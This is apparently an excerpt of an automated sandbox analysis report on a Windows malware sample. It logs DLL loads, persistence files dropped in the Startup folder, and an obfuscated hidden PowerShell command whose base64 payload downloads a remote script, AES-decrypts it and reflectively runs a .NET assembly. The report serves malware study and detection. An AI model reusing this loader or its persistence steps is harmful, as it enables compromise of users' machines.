                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

                Data Obfuscation

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('SysQD')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run). DefineDynamicModule('SysQM', $false). De
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVF
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBsbHF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnNWdDOWlvTUpXT2I1N0x3SEVHa3B3WmhtTlZwN0ZMdzhpNXJxTGJ4MElxWT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnL0lVRjExNmJ2NUp6MHVFSGZ0Q2ZMUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBwb2N4YSgkcGFyYW1fdmFyKXsJSUVYICckd29yYnQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaG5jdWE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRmd2RucD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR3b3JidCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZndkbnAuQ29weVRvKCRobmN1YSk7CSRmd2RucC5EaXNwb3NlKCk7CSR3b3JidC5EaXNwb3NlKCk7CSRobmN1YS5EaXNwb3NlKCk7CSRobmN1YS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGdtdm1yKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR2cHh2aT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGFibmt0PSR2cHh2aS5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRhYm5rdC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JG9udCA9ICRlbnY6VVNFUk5BTUU7JG5zb3RnID0gJ0M6XFVzZXJzXCcgKyAkb250ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbnNvdGc7JG5raWt4PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,13_2_004044A4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0044693D push ecx; ret 13_2_0044694D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00451D54 push eax; ret 13_2_00451D61
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_0044B090 push eax; ret 15_2_0044B0A4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_0044B090 push eax; ret 15_2_0044B0CC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00451D34 push eax; ret 15_2_00451D41
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00444E71 push ecx; ret 15_2_00444E81
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f1e01fdf.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f1e01fdf.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_df859eae.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_df859eae.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_81f4ce5e.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_81f4ce5e.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4a774a3c.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4a774a3c.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_25a2536c.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_25a2536c.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a960cfa7.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a960cfa7.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e29f9ec9.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_e29f9ec9.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f7534387.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f7534387.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f0ceb41b.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_f0ceb41b.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2513bab9.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2513bab9.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2c46f0ee.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2c46f0ee.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b6e52985.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b6e52985.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cad7c66e.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_cad7c66e.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ff75f7e1.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_ff75f7e1.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_d059825f.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_d059825f.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_d8a7cb2c.cmd
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_d8a7cb2c.cmd\:Zone.Identifier:$DATA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 15_2_004047CB
                Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX (2 identical entries in the report)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (107 identical entries in the report)
                Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX (2 identical entries in the report)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (98 identical entries in the report)
                Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX (2 identical entries in the report)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (22 identical entries in the report)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
